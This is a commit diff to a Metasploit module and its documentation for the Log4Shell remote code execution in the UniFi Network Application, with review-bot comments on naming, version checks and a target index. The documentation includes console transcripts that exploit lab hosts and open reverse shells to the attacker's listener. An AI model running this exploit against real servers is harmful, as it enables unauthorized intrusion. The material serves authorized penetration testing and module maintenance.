Update docs, note OS X support

Spencer McIntyre 2022-01-20 10:47:11 -05:00
parent ba469a4b2c
commit 579627f5c7
2 changed files with 62 additions and 12 deletions

@ -1,7 +1,7 @@
## Vulnerable Application
### Description
The Ubiquiti Unifi Controller application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
deserialize a malicious Java object. This results in OS command execution.
@ -10,7 +10,7 @@ This module will start an LDAP server that the target will need to connect to.
### Setup
1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
2. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
2. Navigate to the service on HTTPS port 8443 to setup the UniFi controller.
3. On step 2, select the button to "Switch to Advanced Setup"
4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
create a local account.
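Review bot: The changed step 2 line still says "setup the UniFi controller", which keeps the old product term while the rest of this commit renames it to "UniFi Network Application", and the verb should be "set up". Suggested wording: "Navigate to the service on HTTPS port 8443 to set up the UniFi Network Application."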
@ -29,16 +29,16 @@ Older versions of the UniFi Network Application can be downloaded from [communit
## Scenarios
### Unifi Controller on Docker
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.55, v6.0.45, and v5.14.23 all contain the fix for this
### UniFi Network Application v6.6.53 on Docker
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
TARGET => Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
RHOST => 192.168.250.6
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
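Review bot: The new scenario heading reads "v6.6.53", but the sentence directly under it uses jacobalberty/unifi:v6.5.53 and the Windows scenario heading changed in this same commit says v6.5.53, so this looks like a typo for v6.5.53. Please correct the heading so it matches the image tag the transcript was captured against.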
@ -64,7 +64,7 @@ pwd
/usr/lib/unifi
```
### Unifi Controler on Windows Server 2016
### UniFi Network Application v6.5.53 on Windows Server 2016
```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
@ -104,4 +104,53 @@ Meterpreter : x86/windows
meterpreter >
```
### UniFi Network Application v5.14.22 on OSX 11.2.3
```
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options
Module options (exploit/multi/http/ubiquiti_unifi_log4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
LDIF_FILE no Directory LDIF file path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 111.111.1.11 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SRVHOST 222.222.2.222 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 389 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_zsh):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 222.222.2.222 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run
[*] Started reverse TCP handler on 222.222.2.222:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
[*] Server stopped.
id
uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
```
[1]: https://community.ui.com/releases?q=network+application
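Review bot: The new OS X transcript starts at "show options", so unlike the Docker scenario it never shows the "use" and "set" commands that produced this configuration, including how the cmd/unix/reverse_zsh payload was selected; adding those lines would make the scenario reproducible. Smaller points in the same block: the heading says "OSX" where the commit subject says "OS X", the sample addresses (111.111.1.11, 222.222.2.222) do not follow the 192.168.250.x style used in the other scenarios, and the full group list in the "id" output could be trimmed to the uid/gid portion.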

@ -11,9 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(_info = {})
super(
'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Description' => %q{
The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
deserialize a malicious Java object. This results in OS command execution.
@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
'SSL' => true,
'WfsDelay' => 30
},
'DefaultTarget' => 1,
'Targets' => [
[
'Windows', {
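Review bot: 'DefaultTarget' => 1 is a bare positional index with nothing stating which target it selects. From the visible context 'Windows' is the first entry in 'Targets', which makes index 1 the entry renamed to 'Unix' in the next hunk, yet the OS X transcript added to the docs in this commit lists "2 Unix" under "Exploit target". Please confirm the intended default, add a short comment naming it next to the index, and regenerate the transcript if its Id is stale.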
@ -44,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
],
[
'Linux', {
'Unix', {
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'DefaultOptions' => {
@ -85,8 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
server_version = Rex::Version.new(server_version)
if server_version < Rex::Version.new('5.13.29')
return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
elsif server_version > Rex::Version.new('6.5.54')
return Exploit::CheckCode::Safe('Versions after 6.5.54 are patched and not affected.')
elsif server_version > Rex::Version.new('6.5.53')
return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
end
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
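Review bot: The upper bound in this version check treats every release from 5.13.29 through 6.5.53 as a candidate, but the documentation updated in this same commit says tags v6.0.45 and v5.14.23 also contain the fix, and both fall inside that range. Those builds will not get the 'Safe' result from the version comparison and rely entirely on the trigger attempt announced by the vprint_status line that follows. A comment stating that this is intentional, or explicit handling of the per-branch fixed versions, would make the behaviour clear to the next reader.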